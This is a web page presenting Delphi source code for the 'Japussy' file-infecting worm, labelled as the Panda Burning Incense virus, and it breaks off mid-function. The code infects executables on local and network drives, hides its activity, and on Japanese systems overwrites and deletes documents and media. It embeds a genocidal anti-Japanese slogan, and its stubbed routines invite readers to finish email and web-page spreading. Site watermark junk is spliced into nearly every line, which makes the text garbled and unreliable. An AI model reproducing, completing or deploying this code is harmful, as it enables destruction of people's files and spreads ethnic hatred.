熊猫烧香病毒源程序代码

)h'_9O1v+x]}0program Japussy;51Testing软件测试网@&@2R!_O%{}'s,QyX
uses

O~*KNd0N)RL0Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
:`#lH(Jt.xAe0const51Testing软件测试网QI\0YQrk%f o
HeaderSize = 82432;       //病毒体的大小
UX5t7lLu~0IconOffset = $12EB8;     //PE文件主图标的偏移量

0i(VR5_Q#B7p0['|z0//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同
3x'M^,H3f
fS!`/F0//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
([2t$G1v4S0J0Z0HeaderSize = 38912;       //Upx压缩过病毒体的大小
lX4K2@6s#}0IconOffset = $92BC;       //Upx压缩过PE文件主图标的偏移量51Testing软件测试网a9@I3hx/g9@Je C

y^9p9u)m&M*C*O1Z)o0 51Testing软件测试网ns/]O o4wDE

-DcurJ)Q0Q!gI1a0//Upx 1.24W 用法: upx -9 --8086 Japussy.exe51Testing软件测试网^+vx\
I`jE'i
}
.|#s `M ~lg+~0IconSize   = $2E8;       //PE文件主图标的大小--744字节
z4ko Xz1f}&in0IconTail   = IconOffset + IconSize; //PE文件主图标的尾部
O-LYGl3ukvq]0ID   = $44444444;     //感染标记51Testing软件测试网8Vg9W!WQB;mT6P

4C,|R(n9w:~1^0//我非常爱你码，以备写入51Testing软件测试网c
M)T9TA7lf
Catchword = 'If a race need to be killed out, it must be Yamato. ' +51Testing软件测试网2F3j3YT^&~zV
  'If a country need to be destroyed, it must be Japan! ' +
'f8H7U j7j"W!G0  '*** W32.Japussy.Worm.A ***';51Testing软件测试网;C
]P me T(V:u
{$R *.RES}
R6N7y8K?[y#J7b0function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; 51Testing软件测试网$?_*Kt#G
stdcall; external 'Kernel32.dll'; //函数声明51Testing软件测试网4[C7n V3| l8ca
var
ymt0v\i0K B5n z0TmpFile: string;51Testing软件测试网@1hbX$C z4H(L
Si:   STARTUPINFO;
'J5qlM@e-~q0Pi:   PROCESS_INFORMATION;
?9N/|"l6q0IsJap:   Boolean = False; //日文操作系统标记51Testing软件测试网4SQuT|
{ 判断是否为Win9x }
A^;["l+L\3G|e0function IsWin9x: Boolean;
? }
m oo(xjA0var51Testing软件测试网Om@
O7M
Ver: TOSVersionInfo;
6]$b!_q u{1q sJ0begin
4O
i7Q(e
z3_}0Result := False;51Testing软件测试网0|
l!{*\ na/?*QMD6j
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
jd6W_+YB r0if not GetVersionEx(Ver) then
^3}o#W7J0Exit;
g3i&j2oEb;c n0if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
2|3W*B6C5n Dg,rN0Result := True;
xSGIf'YbB{dL#k0end;
3j(SJ2Q(vGe7S"M$y*S0{ 在流之间复制 }
:M5R8S+i;K0procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;51Testing软件测试网*Vq1mtptT1?X
dStartPos: Integer; Count: Integer);
?0B(n9o/C~#c3}4w0var
^H3br\j0sCurPos, dCurPos: Integer;
"b&eOe$_R?0begin
]-zOfO6`/X0sCurPos := Src.Position;
-[
Se0}-{k0dCurPos := Dst.Position;
,VMaDu PpC0Src.Seek(sStartPos, 0);51Testing软件测试网.ZXu.o(Vh
Dst.Seek(dStartPos, 0);51Testing软件测试网+GI RZy O"b1|Y
Dst.CopyFrom(Src, Count);
/n9K5JE.P&?0Src.Seek(sCurPos, 0);51Testing软件测试网t&cG[o)d[]
Dst.Seek(dCurPos, 0);51Testing软件测试网I@.zt2K w(c
end;
H"`:A,|\qkjzX0{ 将宿主文件从已感染的PE文件中分离出来，以备使用 }51Testing软件测试网xwT!N9IRb
procedure ExtractFile(FileName: string);51Testing软件测试网,N3]O-u@1~`
var
-ID{)aXXB6{MY0sStream, dStream: TFileStream;51Testing软件测试网Aoc"QW:Ve#I5p
begin51Testing软件测试网!z1FiL&r/['g%Q
try51Testing软件测试网:cF"`8p{uO`i
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
o `
PnVL3Ty0try51Testing软件测试网yR!u/bo5MEi"V
dStream := TFileStream.Create(FileName, fmCreate);51Testing软件测试网*w"Pcr&{n@
try
/I
`7\$_"\*T:t5R+}0sStream.Seek(HeaderSize, 0); / 过头部的病毒部分51Testing软件测试网]*CRG9zK,D:yj0AN
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);51Testing软件测试网po"H+wUB
?AlA*I
finally51Testing软件测试网S#lgWb gUggE
dStream.Free;
O:\j9s hx d3G0end;51Testing软件测试网r} Tw]h+X
finally51Testing软件测试网)M!f$e8v3uIE'h)Ng
sStream.Free;
M5K;r4TL4FU"{ JZ0end;
(Hv/m2Ozdw4~JT0except
l r"C(G ]0end;51Testing软件测试网/Le1OA bME
end;51Testing软件测试网s/|8c k^0d#^![Q
{ 填充STARTUPINFO结构 }51Testing软件测试网?Z#fnr#hQn9W8z
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);51Testing软件测试网{DnaJ4w9sk }
begin51Testing软件测试网Gi6r/st,bILJ
Si.cb := SizeOf(Si);
#X}8eD,M
p0Si.lpReserved := nil;
ro*XE5Jspm2C0Si.lpDesktop := nil;
DZqt1a'h,f0Si.lpTitle := nil;
4dus3C)y Ax8d0Si.dwFlags := STARTF_USESHOWWINDOW;
aI0?1u"~(|I+e0Si.wShowWindow := State;51Testing软件测试网D5q-nCV\#K
Si.cbReserved2 := 0;
Y e+vrZ FKo]0Si.lpReserved2 := nil;51Testing软件测试网Ub[t oh9[ X}c
end;51Testing软件测试网vH0MV0~zp
P@
{ 发带毒邮件 }
G!q cq`Yy0procedure SendMail;51Testing软件测试网9V!S]'Q}P,F-K[I
begin
x)h*CCpU0//哪位仁兄愿意完成之？汤姆感激不尽！
FI P"F$la!{Ql|;[0end;
t6mny'A9Vd0{ 感染PE文件 }
)f5YZR3t8_5{4Zc0procedure InfectOneFile(FileName: string);51Testing软件测试网Xn!R$F}g%r"V
var
f*L9X:|4y0HdrStream, SrcStream: TFileStream;
N^eT
X7r0IcoStream, DstStream: TMemoryStream;
o$p6v]2|0Y#p0iID: LongInt;51Testing软件测试网]k |a[o jQ:~ cT
aIcon: TIcon;51Testing软件测试网2Hs4g
\U`pS:G
Infected, IsPE: Boolean;
h"D0nLqJ9m$b]5G9lJ0i: Integer;

u+G?lS.C^#QP0Buf: array[0..1] of Char;
kY:^n S3N,\.S*b5k&z0begin
-vYP?HBb:a2|{7mG0try //出错则文件正在被使用，退出51Testing软件测试网3C K3e!|/Jv4{X)M
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染51Testing软件测试网i TP5H)\
Exit;51Testing软件测试网I#Cd1q3o
Infected := False;51Testing软件测试网8E$pSM~G
IsPE   := False;51Testing软件测试网*m"V`iu
SrcStream := TFileStream.Create(FileName, fmOpenRead);51Testing软件测试网+M*XDo7JXc9t)FD
try51Testing软件测试网F@\:iY3P"v
for i := 0 to $108 do //检查PE文件头51Testing软件测试网p? o#Qc
begin51Testing软件测试网]!fH\D S e
SrcStream.Seek(i, soFromBeginning);51Testing软件测试网%jU"@
J5SX'pO'b
SrcStream.Read(Buf, 2);51Testing软件测试网+UZ+p4K)~8x
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
*LEW6R(_0begin
DT\g\%K+T W1u/_0  IsPE := True; //是PE文件
+n vxJq3~
B0Y0  Break;
#A&ecd;A)t(W3j0end;
d"[Z:e[?B-r0end;51Testing软件测试网 E)pA
|3S2`nu(Q
SrcStream.Seek(-4, soFromEnd); //检查感染标记
'mP,L0\N0SrcStream.Read(iID, 4);51Testing软件测试网D7OEL
~
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染51Testing软件测试网$nDn1\!E"@'?V
Infected := True;
G0B(F j0Nk%A0finally51Testing软件测试网Vb1Re*m1b"d
SrcStream.Free;
{T(_u8TUS0l0end;
;Y dC!E*v5@Ql0if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
1rU#}%Rk2kp0Exit;
5PQ6c3AKS0IcoStream := TMemoryStream.Create;
8Zy%Ei
y7V;k0DstStream := TMemoryStream.Create;51Testing软件测试网$r zXsoh0n
OW4\
try51Testing软件测试网 kE'?.bBL4\J
aIcon := TIcon.Create;
9~?0XyU`.m_2@i4I0try51Testing软件测试网(j@%FB]Va&f$m
//得到被感染文件的主图标(744字节)，存入流
?Xzk/fF-U+C0aIcon.ReleaseHandle;51Testing软件测试网*KeTj;I6h
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);51Testing软件测试网3d:n0v"p_[
aIcon.SaveToStream(IcoStream);
&Z6x-q%N8hR0finally51Testing软件测试网 T$x}TK.o
aIcon.Free;51Testing软件测试网&T$KqE7f]'{2o(b
end;51Testing软件测试网 Z+Wf/@F_
SrcStream := TFileStream.Create(FileName, fmOpenRead);
8o!QfW4^'M*mg7C7o0//头文件51Testing软件测试网6c_ NN&fD e
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
QdQ1p']Fs#[0try
}4|2Bl)XPO'OQO3q0//写入病毒体主图标之前的数据
$N(V
NML{8BK0CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
+g.\U?e&|0//写入目前程序的主图标
d5E1r"Q:w.PK0CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);51Testing软件测试网:b(`-\-BM4ix
//写入病毒体主图标到病毒体尾部之间的数据51Testing软件测试网F L.o e,h'|I
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
l }Asj._#\0//写入宿主程序51Testing软件测试网1^r"hY}:p
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);51Testing软件测试网%R)e9U1_-i9`
R*`P
//写入已感染的标记
:PWW KM0h~$e3n0DstStream.Seek(0, 2);51Testing软件测试网cK}A*n/\
iID := $44444444;
;Bq e'yw7EP/p0DstStream.Write(iID, 4);51Testing软件测试网
} Ez.MxFIw
finally
}sa
u/\JaKo0HdrStream.Free;51Testing软件测试网
Y`d(d
Vm
end;51Testing软件测试网]i;I ^
MQ
finally
Q0YZ9O2K#y0SrcStream.Free;51Testing软件测试网"?VxQ(P ke T7@#P
IcoStream.Free;51Testing软件测试网f%D S^`1U&d
DstStream.SaveToFile(FileName); //替换宿主文件51Testing软件测试网!n!}r,yq0p
DstStream.Free;51Testing软件测试网@/_%@:p]!P
end;
3j z%b|yk(yB7w5R0except;51Testing软件测试网C!C)c#XI wvnI
end;51Testing软件测试网(Agn6h y-Tc
end;
?2\ pCZw`0{ 将目标文件写入我非常爱你码后删除 }
+F
Xa*\1`8Ih0procedure SmashFile(FileName: string);
f9n*EA"SM7y2X:d0var
T{1RG
|l `0FileHandle: Integer;51Testing软件测试网3}H#{ `%xl'D
i, Size, Mass, Max, Len: Integer;
r&z(g3zE"d'}m ]$L0begin51Testing软件测试网@)J X9}tne;L~
Rh^
try
+P:e:Y @7n|tc0SetFileAttributes(PChar(FileName), 0); //去掉只读属性51Testing软件测试网p2iO~U l\
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
)g6y-p\%v5G1U H0try
eKSm!C0Size := GetFileSize(FileHandle, nil); //文件大小51Testing软件测试网G&["`%p |(U_3q s1iZC
i := 0;51Testing软件测试网'Og$X*M8_9o)B ~0M1v
Randomize;
*Q%L"R~D~&S
Q7{UV@(|0Max := Random(15); //写入我非常爱你码的随机次数
k@u rXqN5G{{-m0if Max < 5 then51Testing软件测试网 W
nS$w~6^-h,wy
Max := 5;51Testing软件测试网p6d @d ]
Mass := Size div Max; //每个间隔块的大小51Testing软件测试网W_%W!_)Wn
j3}I
Len := Length(Catchword);51Testing软件测试网~_{$w9moCw9j%qw
while i < Max do51Testing软件测试网 o@#t W@
begin51Testing软件测试网%["o8u"^t9Xe
FileSeek(FileHandle, i * Mass, 0); //定位51Testing软件测试网SJ%hxz^
Bg
//写入我非常爱你码，将文件彻底破坏掉
t7g+Y$[H$n
H0FileWrite(FileHandle, Catchword, Len);51Testing软件测试网S[!CVKYpJ
Inc(i);51Testing软件测试网0y&{1DG#a!rd
end;
6r:wUV%BR ~7b0finally
9B8h%F![#e&v0FileClose(FileHandle); //关闭文件
5Yw$n F^pLz0dy f0D0end;51Testing软件测试网,?Ukc
_k n7F'q
DeleteFile(PChar(FileName)); //删除之
WH{H-L8l$v0except51Testing软件测试网ng*J.G8W5H~0J^
end;
i `+L0MK:J0end;51Testing软件测试网3ds`,@7zK.J
{ 获得可写的驱动器列表 }51Testing软件测试网 ?#?`Zr
function GetDrives: string;
u5QoXr?-x0var
+?s?qi)r
Y0DiskType: Word;

TNE%d$uN{0D: Char;51Testing软件测试网"fT%cb+oj2mR
Str: string;51Testing软件测试网.K!qj3Vda7M0f6qd
i: Integer;51Testing软件测试网u PN@$V A5}.R]
begin51Testing软件测试网yo0G7LpA$|
for i := 0 to 25 do //遍历26个字母51Testing软件测试网3zCd4a}B? `
begin
LS@P+SN$`0D := Chr(i + 65);
\2e ~0uGt0Str := D + ':\';51Testing软件测试网q/sN\9N
DiskType := GetDriveType(PChar(Str));
o}#V ^7e#T!wK0//得到本地磁盘和网络盘51Testing软件测试网:l7o7A6K!_$m-n
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
W&rba9?/^k0Result := Result + D;51Testing软件测试网*vX jY2O7f H
end;
},y#U&f.Z@1?0end;51Testing软件测试网5UbT@ Z jm
{ 遍历目录，感染和摧毁文件 }51Testing软件测试网1C v:fR0E
procedure LoopFiles(Path, Mask: string);
;l$`}#^(~@2t0var
M/{SA}W4|0i, Count: Integer;51Testing软件测试网4ll\4eN
Fn, Ext: string;
8a"tC t,V2oo }`0|0SubDir: TStrings;
:]s pO~S0SearchRec: TSearchRec;
G0iV,kCh#gB0Msg: TMsg;
yg\(eJr4r0function IsValidDir(SearchRec: TSearchRec): Integer;51Testing软件测试网I6mkB/QI7[~EV
begin51Testing软件测试网 LTvt9\ w0eY
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
9X F2xS7S*Qs0(SearchRec.Name <> '..') then51Testing软件测试网lpW,?F}
Result := 0 //不是目录
].@[8UBmc0else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and51Testing软件测试网BW4AB1t]2N+z
(SearchRec.Name <> '..') then51Testing软件测试网KM~3Ra+|y
Result := 1 //不是根目录51Testing软件测试网/z0n`;w#X2[?0B C2{c
else Result := 2; //是根目录
Q-BZGT-s0end;
R,c5x3A#o0begin51Testing软件测试网D E
Lw|(Cn
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then51Testing软件测试网m0Z-y
I&}#nF&j
begin51Testing软件测试网{ k2iB[/P
repeat51Testing软件测试网5[!QF q/?*cL/E
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑51Testing软件测试网:P5jm d@&H'^5d
if IsValidDir(SearchRec) = 0 then51Testing软件测试网'\H)iCD3^0Q
begin
Mi+DI%[0Fn := Path + SearchRec.Name;51Testing软件测试网-@Hw_-Tb
Ext := UpperCase(ExtractFileExt(Fn));
1_ vD ^2en2?8?0if (Ext = '.EXE') or (Ext = '.SCR') then51Testing软件测试网}K5}3L{i
E(I
begin51Testing软件测试网Y aL4A8ED
  InfectOneFile(Fn); //感染可执行文件   51Testing软件测试网,?2q
`lY4_4g
k
end51Testing软件测试网*Gel.xn8p[
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then51Testing软件测试网p`\!GL
?I xd
begin
y$A,pH2M'e6Z0  //感染HTML和ASP文件，将Base64编码后的病毒写入51Testing软件测试网i!RcA"z+s#|^O&g
  //感染浏览此网页的所有用户，这个是我最喜欢的！
}}C8gkK"|K)D0  //哪位大兄弟愿意完成之？汤姆感激不尽！
*Sqhi5ek0end51Testing软件测试网+GX [)y%Q;d%ZLs
else if Ext = '.WAB' then //Outlook地址簿文件51Testing软件测试网Nf#a{g6A^
begin51Testing软件测试网X_u'^,pD.Ca
  //获取Outlook邮件地址
Qo8{8fH~y4_([0end51Testing软件测试网2[*`{rnN
else if Ext = '.ADC' then //Foxmail地址自动完成文件51Testing软件测试网8Oy7C"Bh4OU
begin
V vlHS!v0  //获取Foxmail邮件地址51Testing软件测试网8N2ccqCD%{7\
end51Testing软件测试网4M$G wyu
else if Ext = 'IND' then //Foxmail地址簿文件51Testing软件测试网#cy]EK
begin51Testing软件测试网V1]MWF3h!GK
  //获取Foxmail邮件地址
;c/H{6l NSOB!R0end51Testing软件测试网&_EX!i.\l+X
else 51Testing软件测试网]@.|k p Vco0w{*N
begin51Testing软件测试网-SU'G_N$EH9F!B
  if IsJap then //是倭文操作系统
M*y?rI~0  begin
tH&C#q:|Ip(_0  if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
8N7@y0c {"O0  (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
9`%?:y(~9I _L+G0  (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
0x%x)V*lO2blu0  (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or51Testing软件测试网*dG&TC~ kPD
  (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or51Testing软件测试网-T$Qg5k;f7J;w T
  (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then51Testing软件测试网t@4G|Dw%Q f"w
    SmashFile(Fn); //摧毁文件
@ LP GD7we4A0  end;
6rc&_e y;s2sBD T6B0end;
fv%~%_h8^y0end;
.d,`
E4A}Lz(k:Q0//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑51Testing软件测试网Pg_!}HN-j!T(i
Sleep(200);
?+d5z&XfNo5m0until (FindNext(SearchRec) <> 0);
@2[C*Z%oJ0end;51Testing软件测试网^s1k,U^
SbRE
{
FindClose(SearchRec);
4Rh*vjm8{0SubDir := TStringList.Create;51Testing软件测试网,v;HDAk
if (FindFirst(Path + '*.